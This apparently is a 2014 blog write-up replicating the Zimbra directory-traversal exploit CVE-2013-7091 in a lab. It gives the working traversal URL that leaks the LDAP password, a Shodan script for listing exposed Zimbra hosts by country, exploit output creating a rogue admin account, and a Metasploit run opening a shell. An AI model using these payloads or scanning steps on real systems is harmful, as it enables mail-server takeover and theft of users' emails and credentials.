Archive for January, 2014

Replicating Zimbra exploit CVE-2013-7091

In this post I will quickly show how using a Zimbra directory traversal vulnerability a remote attacker can easily break into other completely unrelated hosts on the internet.

Don’t know what Zimbra is ?

From Zimbra themselves:
Zimbra is an enterprise-class email, calendar and collaboration solution, built for the cloud, both public and private……..

Just read “what is Zimbra?” from http://www.zimbra.com/ but in summary Zimbra will help you setup and manage email server for your organization and your users working without much hustle

About the Vulnerability:

This vulnerability was discovered early December 2013 by rubina119 to be precise the disclosure date is 2013-12-06

What does it involve ?

Simply picked from http://osvdb.org description

Zimbra contains a flaw that may allow a remote attacker to execute arbitrary commands or code. The issue is due to /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz not properly sanitizing user input, specifically directory traversal style attacks (e.g., ../../) supplied to the ‘skin’ parameter. This may allow an attacker to include a file from the targeted host that contains arbitrary commands or code that will be executed by the vulnerable script. Such attacks are limited due to the script only calling files already on the target host. In addition, this flaw can potentially be used to disclose the contents of any file on the system accessible by the web server.

Enough with that so when I saw this I read somewhere(can’t remember where) that it was tested successful on Ubuntu server 12.04 so I decided to test and see if it works on CentOS.
The first step was to do a CentOS install on VirtualBox I went for “CentOS-6.3-x86_64-LiveCD.iso”.

# uname  -a
Linux localhost.localdomain 2.6.32-279.el6.x86_64 #1 SMP Fri Jun 22 12:19:21 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux
[root@localhost ~]# 

With CentOS up running we can grab a vulnerable copy of Zimbra Collaboration Server (ZCS) from http://www.zimbra.com/

Note: There are several versions avaiable but the vulnerable/affected ones are 8.0.2 and 7.2.2
setting up ZCS is pretty much easy and in case of problems there are solutions all over they are only a search away


http://www.howtoforge.com/installing-zimbra-collaboration-suite-7-on-centos-5.x-64bit

The Attack:
As documented in the original POC a remote attacker can read /opt/zimbra/conf/localconfig.xml which has credentials for zimbra ldap user “zimbra_user” and password “zimbra_ldap_password” which can be used to create an admin user in Zimbra as well upload files in “/opt/zimbra/jetty-distribution-7.6.2.z4/webapps/zimbra/downloads” (think of uploading malicious files and executing them)
When ZCS is running user can easily read there emails via browser by simply going to “mail.their-organisation.com”
so to give the exploit a trial we simply need to visit the mail server IP then append
/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00


https://192.168.0.101/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00

Note:
Doing a Ctrl + F and type “ldap_pass” will show zimbra user ldap password in clear text

Risk:

At the moment many people will not see how this is a big issue,but as stated above this vulnerability can aid an attacker completely control an organization mail server by creating an administrator user in the mail server who can read all users emails as well send emails with any email address identity in the organization.
Again this might not seem as an issue to some people but imagine an attacker does not send any email but he/she searches for juicy information in all users emails.
In this day and age people still email credentials in clear text if you don’t believe it simply search your official email address for “password” or even “login“.
now think of a scenario where the organization in question is a site hosting company or a local ISP I know you can think of even more scenarios.

How can you become a target ?

Finding these targets is more trivial than many people want to imagine for example an attacker use shodan http://www.shodanhq.com/ many people know it if not just check it out but simply put shodan is like google for hackers.
With shodan you can get an API key and come up with a simple python script to grab IPs of machines running Zimbra and you can even be more specific and grab a particular country by simply specifying the country code.
the below python script can list IPs of host running Zimbra given a valid API key

#a python script to search Shodan given a valid API
#author: plast1k
#ref: shodan API reference 

from shodan import WebAPI
SHODAN_API_KEY = "XXXXX_a valid shodan API key here XXXXXX"

api = WebAPI(SHODAN_API_KEY)
# Wrap the request in a try/ except block to catch errors
try:
        # Search Shodan
        results = api.search('zimbra country:"country_code_here"')

        # Show the results
        print 'Results found: %s' % results['total']
        for result in results['matches']:
                print 'IP: %s' % result['ip']
                #print result['data']
                print ''
except Exception, e:
        print 'Error: %s' % e

#end

NB:to be able to import WebAPI you need python library for shodan this can be easily done using easy_install


:~#  easy_install shodan
Searching for shodan
Best match: shodan 0.9.0
Processing shodan-0.9.0-py2.7.egg
shodan 0.9.0 is already the active version in easy-install.pth

Using /usr/local/lib/python2.7/dist-packages/shodan-0.9.0-py2.7.egg
Processing dependencies for shodan
Finished processing dependencies for shodan
:~# 

Case Study:

Using the Zimbra installation we got let see how can this vulnerability can be used to give access to some other hosts as well a wealth of infomation.
lets download the original POC ruby script from packet storm and extract it


:~$ mkdir zimbra
:~$ cd zimbra
:~/zimbra$ wget http://packetstormsecurity.com/files/download/124321/zimbra-lfi.tgz
:~/zimbra$ tar -xvf zimbra-lfi.tgz 
zimbra-lfi.txt
run.rb
ultils.rb
:~/zimbra$ 

Then assuming you have read through it we try it against our target
(please don’t try on system you don’t own)


ruby run.rb  -t 192.168.0.101 -u zimbra -p nd7qw334sRRJFR

#########################################################################################
Zimbra Email Collaboration Server 0day Exploit by rubina119
#########################################################################################

[+] Looking if host is vuln...
[+] Host is vuln exploiting
[+] Obtaining Domain Name
[+] Creating Account
[+] Elevating Privileges
[+] Login Credentials
    [*] Login URL : https://zimbra.chimera.co.ke:7071/zimbraAdmin/ 
    [*] Account   : zimbra@zimbra.chimera.co.ke
    [*] Password  : nd7qw334sRRJFR
[+] Successfully Exploited !

As you can see an administrator user has been created on our target Zimbra server now using these new credentials we simply browse to the Zimbra admin URL usually https://server-ip:7071/zimbraAdmin/ and login

zim_login

Right clicking on Alice’s we can read all her emails and doing a simple search for word password we can find she had sent an email to Bob some times back with login details for another server

search_password

Final words:

This issue should not be ignored as it is critical and not as minor as many would want to take it given the possible number people running these versions of Zimbraon the internet.
It is also very important to noet that this same flaw can be used to gain shell access to these systems as well and a metaspoit module is even there to give the attacker shell access instantly. (See the below metasploit example )


msf exploit(zimbra_lfi) > show options 

Module options (exploit/unix/webapp/zimbra_lfi):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   DEPTH      9                yes       Traversal depth until to reach the root path
   Proxies                     no        Use a proxy chain
   RHOST      192.168.0.101    yes       The target address
   RPORT      7071             yes       The target port
   TARGETURI  /zimbraAdmin     yes       Path to zimbraAdmin web application
   VHOST                       no        HTTP server virtual host
   ZIMBRADIR  /opt/zimbra      yes       Zimbra installation path on the target filesystem (/opt/zimbra by default)

Payload options (linux/x86/shell/bind_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  4444             yes       The listen port
   RHOST  192.168.0.101    no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Zimbra 8.0.2 / Linux

msf exploit(zimbra_lfi) > exploit 

[*] Started bind handler
[*] 192.168.0.101:7071 - Getting login credentials...
[+] 192.168.0.101:7071 - Got login credentials!
[*] 192.168.0.101:7071 - Getting auth token...
[+] 192.168.0.101:7071 - Got auth token!
[*] 192.168.0.101:7071 - Uploading payload
[*] 192.168.0.101:7071 - Uploading jsp stager
[*] 192.168.0.101:7071 - Executing payload on /downloads/pghMCARIa.jsp
[*] Sending stage (36 bytes) to 192.168.0.101
[*] Command shell session 1 opened (192.168.0.102:47679 -> 192.168.0.101:4444) at 2014-01-11 23:43:35 +0300
[+] Deleted ../jetty/webapps/zimbra/downloads/pghMCARIa.jsp
[+] Deleted ../jetty/webapps/zimbra/downloads/TfTXWDJInTRhCp

1126108370
desJMuxOIzwyyRgjsRoskoduIAaGetPB
yovsKBLRoOYhVpvWeiMypsPOkjOFaTBw
QXQQEVIhPpxBlHrtVYtmlwpPWMjcwfxc
uname -a
Linux localhost.localdomain 2.6.32-279.el6.x86_64 #1 SMP Fri Jun 22 12:19:21 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux

So if you are a Zimbra admin make an effort of upgrading

Reference:

http://cvedetails.com/cve/2013-7091/
http://www.osvdb.org/100747
http://www.securityfocus.com/bid/64149
http://www.exploit-db.com/exploits/30085
http://cxsecurity.com/issue/WLB-2013120097
https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/zimbra_lfi.rb